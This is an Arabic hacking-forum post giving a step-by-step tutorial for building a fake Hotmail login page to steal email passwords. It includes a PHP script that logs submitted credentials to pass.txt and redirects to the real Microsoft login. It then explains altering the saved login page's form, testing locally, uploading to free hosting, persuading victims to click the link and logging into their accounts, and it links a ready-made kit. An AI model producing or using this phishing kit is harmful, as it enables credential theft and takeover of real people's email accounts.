- اقتباس :
- أول خطوة سوف نقوم بها هي فتح المفكرة ( notepad) ونسخ الكود التالي ولصقه داخل المفكرة :
- الكود:
-
<?php
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
$redirect = "http://login.live.com/login.srf?wa=w...4855&mkt=en-US";
header("********:$redirect");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
طبعاً راح تقولوا هذا كود ايش ؟
أقلكم هذا هو الكود الذهبي إلى راح يرسل التبليغ لنا ، طيب بعد ماقمنا بنسخة ولصقه في المفكرة نقوم بحفظه باسم ( login.php ) وامتداده اعتقد واضح ومع ذلك نحط صورة توضيحيه لعيونكم :
طيب بكذا انهينا الخطوة الأولى ، وننتقل للخطوة الثانية وهي الصفحة ، نروح للمتصفح ونفتح صفحة تسجيل الهوتميل
- الكود:
-
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1258901240&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&id=64855&mkt=en-us&lc=1025
بعد فتح صفحة التسجيل نقوم بحفظها اضغط على ( ctrl+s) اذا متصفحك فايرفوكس
صورة توضيحية
بعد حفظنا للصفحة نقوم بفتحها باستخدام الفكرة ( notepad ) ونقوم بالبحث عن كلمة ( action ) وعندما نجدها نقوم بتغيير العبارة التي أمامها إلى اسم الملف الذي حفظناه في الخطوة الأولى ( login.php ) كما نقوم بالبحث عن كلمة ( post ) وعادة تاتي قبل كلمة أكشن ونقوم بتغييرها إلى كلمة ( get ) ومن ثم نقوم بحفظ التعديلات ...
صورة توضيحية الصفحة قبل التعديل
صورة توضيحية الصفحة بعد التعديل
إلى هنا نكون قطعنا مرحلة جيدة وأصبح لدينا ملفين الأول كود التبليغ والثاني الصفحة ، قبل مانقوم برفعها على استضافة راح نقوم بتجربة العملية على أنفسنا ونشوف ايش النتيجه راح نستخدم برنامج WampServer وهو عبارة عن برنامج سرفر شخصي ...
تحميل البرنامج
http://www.zshare.net/download/68834233760e9f7aبعد تحميل البرنامج وتنصيبه راح ينزل في السي نقوم بفتح السي ومنه نقوم بفتح مجلد wamp ومنه نقوم بفتح مجلد www راح نجد داخله ملف باسم اندكس نقوم بتغيير اسمه الى اي شي حتى لايتعارض مع اسم صفحتنا ، بعد ذلك نقوم بنقل الملفين الذي كوناها في الخطوتين السابقة إلى داخل هذا المجلد ...
صورة توضيحية للمجلد قبل نقل الملفات إليه
صورة توضيحية للمجلد بعد نقل الملفات إليه
بعد ذلك نذهب إلى المتصفح ونقوم بكتابة الرابط التالي في العنوان :
- الكود:
-
http://127.0.0.1/
سنجد أن المتصفح قام بفتح صفحتنا المزورة التي وضعناها سابقاً في مجلد www بداخل مجلد السرفر الشخصي ، نقوم بإجراء التجربة ونرى ماذا ينتج ، نقوم بوضع أي عنوان ايميل ونقوم بوضع أي كلمة مرور ومن ثم نقوم بالضغط على signin ونتابع ماذا حدث ....
صور توضيحية
ياسلام أعتقد شغل نظيف وأخر حلاوة وتبليغ ولا أحلى ولا أسرع من كذا صارووووووخ أرض- أرض ...
طيب بعد ما اتأكدنا أن الصفحة تمام والتبليغ مية مية ، نقوم برفع الثلاث ملفات ( index.php - login.php -pass ) إلى مساحتنا المجانية وأعتقد الكل يعرف كيف يعمله مساحة مجانية ، بعد الرفع نقوم بتجربة الصفحة على أنفسنا والنتائج راح تعجبكم إنشاء الله ...، بعد ذلك تبدأ عملية التخطيط لاختراق ايميلات الضحايا من خلال ارسال روابط الصفحة لهم وهذه العملية تعتمد على ذكائك في اقناع الضحية لضغطه على الرابط وفي نفس الوقت يجب أن تكون مستعد عند ملف الباس المرفوع لكي تشاهد معلومات الضحية ومن ثم الذهاب مسرعا لتسجيل دخولك لإيميله
لحظة الموضوع ماأنتهى لاكن أخوكم تعب فاعذروني ، إنشاء الله راح أكمل الموضوع باضافة طريقة أخرى للإختراق بالصفحة المزورة
والأن قبل مانختم الموضوع ، يطيب لي أن أرفق لكم صفحة الهوتميل المزورة وكود التبليغ من انتاج مختبرات جيوش الهكر وقد أثبتت فعاليتها الحمد لله ....
التحميل
http://www.zshare.net/download/68886928e74090deباسوورد فك الضغط لكافة البرامج في الموضوع
- الكود:
-
www.aljyyosh.com
بسلامه
- اقتباس :